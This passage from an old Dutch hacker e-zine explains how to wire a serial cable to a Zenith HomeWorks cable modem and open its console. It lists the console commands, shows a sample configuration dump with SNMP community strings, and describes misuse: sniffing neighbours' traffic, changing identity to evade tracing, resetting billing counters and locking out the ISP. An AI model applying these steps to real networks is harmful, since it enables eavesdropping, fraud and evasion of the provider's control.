beschikken). Deze vinden het een kwalijke ontwikkeling, dat dit soort dingen in huidige tijd nog kunnen. Zij vertrouwen erop dat de desbetreffende ISP op korte termijn problemen oplost, en hopen dat men dit keer wel bewust met privacy, beveiliging en kwaliteit van kabelinternet omgaat. ] Kabelmodem bewijst dat hij uitermate geschikt is voor misbruik door criminelen. Door dat gehele kabelmodem is configureren is door iedereen, kan in eens alle langskomende verkeer getapt worden, waardoor verhandelingen en passwords die andere kabelmodem gebruikers in zelfde ring gebruiken in 1 klap door iedereen die onderstaande handelingen verrichten leesbaar en uiteraard te veranderen. Ook kan iemand zijn gegevens veranderen waardoor hij als het ware kan onderduiken, doordat hij gegevens kan invoeren die hij wilt wordt hij vrijwel ontraceerbaar, men kan slechts hooguit de wijk aanwijzen waar diegene zich bevind, maar de indentiteit en exacte locatie kan slechts worden vastgesteld door kabel voor kabel in elke straat te gaan meten, dit onzettende karwei staat in geen verhouding tot de enkele seconden die iemand nodig heeft om zijn identiteit weer te veranderen, of terug te veranderen. Ook kan de teller op nul worden gezet, en de wachtwoorden van de beheerders worden gewijzigd, waardoor beheer van afstand onmogelijk is geworden, en het van afstand afsluiten van wanbetalers onmogelijk wordt, dit in combinatie met bovenstaande maakt de kabelmodem uitermate geschikt voor criminele doeleinden. -- HOMEWorks Universal V10.3, 4 Mbps Multiweb(tm) Zenith(tm) HomeWorks 4Mbps kabelmodem instellingen aanpassen: Het kan onder sommige omstandigheden handig zijn de instellingen van je kabelmodem te kunnen bekijken en/of wijzigen. Bijvoorbeeld om te kijken of een storing aan jouw aparatuur ligt of weer eens te wijten is aan slecht functionerende hardware bij de provider (in dit geval dus TFI/Sonera/Multiweb). De mogelijke instellingen omvatten ondermeer het aan en uitzetten van het transparant doorgeven van alle verkeer op de bus (zodat je netwerk kaart(en) dus alle pakketjes data van alle andere kabelmodems op het (virtuele) segment kunnen zien), Instellen van User en Password (om te zorgen dat derden (dus ook de ISP!) niet meer op jouw gehuurde/in bruikleen zijnde kabelmodem kunnen inbreken om wijzigingen te maken in de configuratie :), het mogelijk maken andere netwerk kaarten aan te sluiten met een ander MAC address en/of IP address (dit laatste in overleg met de isp, MAC addressen (hardware addressen van onderandere netwerk kaarten zijn uiteraard gewoon jouw zorg als klant, de electriciteits maatschappij moet ook niet zeuren als je een andere gloeilamp aansluit, sommige inferieure kabelinternet aanbieders zien dit helaas anders in). Het resetten van de interne trafficmeters van het modem behoord ook tot de mogelijkheden (let wel op: bij sommige contracten kan dit problemen bij de facturering tot gevolg hebben). Om dit te bewerkstelligen zul je een kabeltje moeten maken die je kan aansluiten op de RJ11 (modular phone) aansluiting op het kabelmodem (die 'kleinere' UTP stekker met RS232 eronder). benodigdheden: DB25 of DB9 Female connector naar keuze 1 meter 4 polig telefoon snoer (plat) en een krimp rj11 connector of een half telefoon aansluit snoer ;-) enig meet, beun en soldeerpook werk leverde het volgende schema op: TERMINAL MODEM RXD-------------RXD TXD-------------TXD GND-------------GND RTS-\ CTS-/ DSR-\ DCD-| DTR-/ Aan de terminal kant zijn 2 verschillende aansluitingen gebruikelijk namelijk DB-9 en DB-25 (beiden female op de kabel, male op de terminal) de pin nummers die bij de namen horen staan hieronder: DB-9: DB25: RJ11: NAME: 1 8 - DCD (Data Carrier Detect) 2 3 3 RXD (Receive Data) 3 2 2 TXD (Transmit Data) 4 20 - DTR (Data Terminal Ready) 5 7 1,4 GND (Ground) 6 6 - DSR (Data Set Ready) 7 4 - RTS (Ready To Send) 8 5 - CTS (Clear To Send) (note de rj11 connector is een 6 polige utp modularie krimp connector, echter meestal zijn alleen de 4 middelste pinnetjes voorzien van contactstrip, de nummering in dit schema is daar dus ook op gebaseerd ;) (de buitenste 2 zijn allebij ground en de middelste 2 zijn RXD resp. TXD) DSR, DTR, en DCD moeten met elkaar verbonden worden om de on-line detectie voor de gek te houden op de terminal RTS en CTS moeten met elkaar verbonden worden om de handshake voor de gek te houden (het modem heeft geen handshake en flowcontrol lijnen en sommige terminal apparatuur verwacht dat wel, dus geven we de terminal zijn eigen signaal weer terug om um voor de gek te houden). Als je even geen RJ11 krimp tool/plugje (gewoon een tang om modulare stekkertjes op telefoonkabels te zetten... gesignaleerd voor 5 piek in de kortingbak bij gamma ;) hebt kan je gewoon een telefoon snoer in tweeen knippen en aan een kant een female RS232 stekker naar keuze solderen volgens bovenstaand schema (mocht het niet werken, probeer dan eens RXD en TXD om te draaien, dit is zowat het enige dat mis kan gaan) Goed het tijdpunt om eea aan het werk te gaan zetten is nu aangebroken. Stop het 'telefoon stekkertje' in het kabelmodem (dus in de RS232 port NIET de ethernet port) en de DB9 of DB25 in je terminal of computer met terminal emulatie programma (minicom, telix, hyperterminal, whatever) stel de terminal af op 8 databits, 1 stopbit, no parity, 9600 bps. een ram op enter moet nu de prompt van het kabelmodem presenteren: > als dat zo is dan heeft het gewerkt. (als dat niet zo is probeer dan even RXD en TXD om te draaien (de middelste 2 pinnetjes van het 'telefoonpluggie') hieronder een opsomming van de commandos van het kabelmodem: hint: blijf van het LOCK commando AF! >help Serial Interface v1.0 Commands SB Dump Broadband Statistics SE Dump Ethernet Statistics SA Dump Broadband and Ethernet Statistics SCB Clear Broadband Statistics SCE Clear Ethernet Statistics SCA Clear All Statistics SI Show system information PR Read value of named parameter PD Dump all parameters to screen PS Set value of named parameter FD Dump filter table FC Clear filter table PW1 Write parameter changes to memory PW2 Write parameter changes to FLASH PW3 Write parameter changes to both memory and FLASH LOCK Lockout further changes RANGE Autorange Interframe Spacing Parameter names and data formats TXFQ Transmit Frequency (nnn.nn) RXFQ Receive Frequency (nnn.nn) TXPW Transmit Power Level (nn) IPAD IP Address (nnn.nnn.nnn.nnn) SMSK Subnet Mask (nnn.nnn.nnn.nnn) MGR1 Primary Manager Id (nnn.nnn.nnn.nnn) MGR2 Second Manager Id (nnn.nnn.nnn.nnn) MGR3 Third Manager Id (nnn.nnn.nnn.nnn) TRAP SNMP Trap Destination (nnn.nnn.nnn.nnn) PLSZ Plant Size (nn) OLDP Use Old Plant Size (Y/N) IFFX Fixed Interfame Spacing (Y/N) RWCO SNMP Read-Write Community (c...c) ROCO SNMP Read-Only Community (c...c) CMNT Comment (c...c) TSCT Test Pattern Count (nnnnn) FMOD Filter Mode (0=None/1=Mac) FLMD Filter List Mode (0=Temp/1=Perm) FMAX Filter List Max Length (0 - 4) FTRP Max Filter Overflow Traps (nnn) TELC Telco Mode (Y/N) PIPO Pass IP Only (Y/N) TXLM Transmit Throttle (nn) > een voorbeeld configuratie zoals in gebruik bij multiweb: het is handig van te voren ff je instellingen ergens te cut en pasten en bewaren ;) >pd RXFQ 362.75 TXFQ 53.0 TXPW 15 IFFX Yes PLSZ 15 OLDP No IPAD 172.19.x.x <--- deze heb ik uiteraard gecensureerd SMSK 255.255.192.0 MGR1 255.255.255.255 MGR2 255.255.255.255 MGR3 255.255.255.255 TRAP 0.0.0.0 RWCO Dfrg56hj ROCO duncan123 CMNT loginnaam@multiweb <--- deze ook ;) FMOD 1 - Mac FLMD 1 - Perm FMAX 1 FTRP 0 TELC No PIPO Yes TXLM 2 TSCT 0 > -- PUBLICATIE VOOR EDUCATIEVE DOELEINDEN! GEBRUIK VAN DEZE INFORMATIE IS OP EIGEN VERANTWOORDELIJKHEID! De autheur van dit artikel en de redactie van H4H neemt uitdrukkelijk afstand van enigerlei aansprakelijkheid voor enigerlei gevolg, inclusief juridische en/of financieele schade, van het gebruik of misbruik van de informatie in dit artikel. Dit artikel is Public-Domain. Copyright is niet voorbehouden aan autheur of enig ander (rechts) persoon. Zentith, HomeWorks, Sonera, TFI en Multiweb zijn geregistreerde handelsnamen van hun respectievelijke houders. ------------------------------------------------------- 10. Eindwoord ------------------------------------------------------- Deel 7 is uit. En hiermee hebben we de toon gezet om hackers4hackers vaker te laten verschijnen en dus ook iets minder artikelen dit keer. Deel 8 verwachten we binnen 3 weken (maar spreek ons er niet op aan als het niet lukt omdat we altijd afhankelijk zijn van de artikelen die we binnen krijgen) Ook met de zomer vakantie voor de deur is het misschien interessant voor schrijvers om daar aandacht aan te gaan besteden. Ook wordt er dor nighthawk druk gewerkt aan een artikel over de meeting de we de volgende keer hopen te plaatsen. Alleen moeten we hem af en toe wat afremmen omdat het artikel eerder op een flame zou gaan lijken dan een verslag ;) Zoals gemerkt is het archief opgeknapt. Als er ideeën zijn om ook van dit soort kleine verbeteringen de site mooier te krijgen horen we dat graag. Ook heeft het ons verbaasd hoe snel er op een nieuwe poll gestemd wordt. Dus zullen we de poll in de toekomst ook zeker meer gaan gebruiken snel een mening van de lezers terug te krijgen! Stem ondertussen even op onze nieuwe poll over hoe iedereen de meeting ervaren heeft. Ook een reden om de site en het archief aan te passen is de hoeveelheid bezoekers die wij iedere dag mogen ontvangen op de h4h site (gemiddeld 250 per dag). Door de delen nu zo te maken dat de lezers maar 1 artikel te gelijk downloaden is de hoeveelheid traffic terug gelopen. Sommige mensen denken dat we www.hackers4hackers.org op één van onze eigen computers hosten. Dit is niet zo. De site wordt gehost door Demon Internet LTD In onze log staan regelmatig portscans en cgi scans. We vragen iedereen vriendelijk dit niet te doen. Omdat dit dus geen zin heeft. En je gegarandeerd een klacht van DEMON kan verwachten naar je provider. Dit is dus anders dan dat er een gebruiker van demon klaagt en zodoende wordt er alerter op gereageerd! Pas dus op! (De redactie)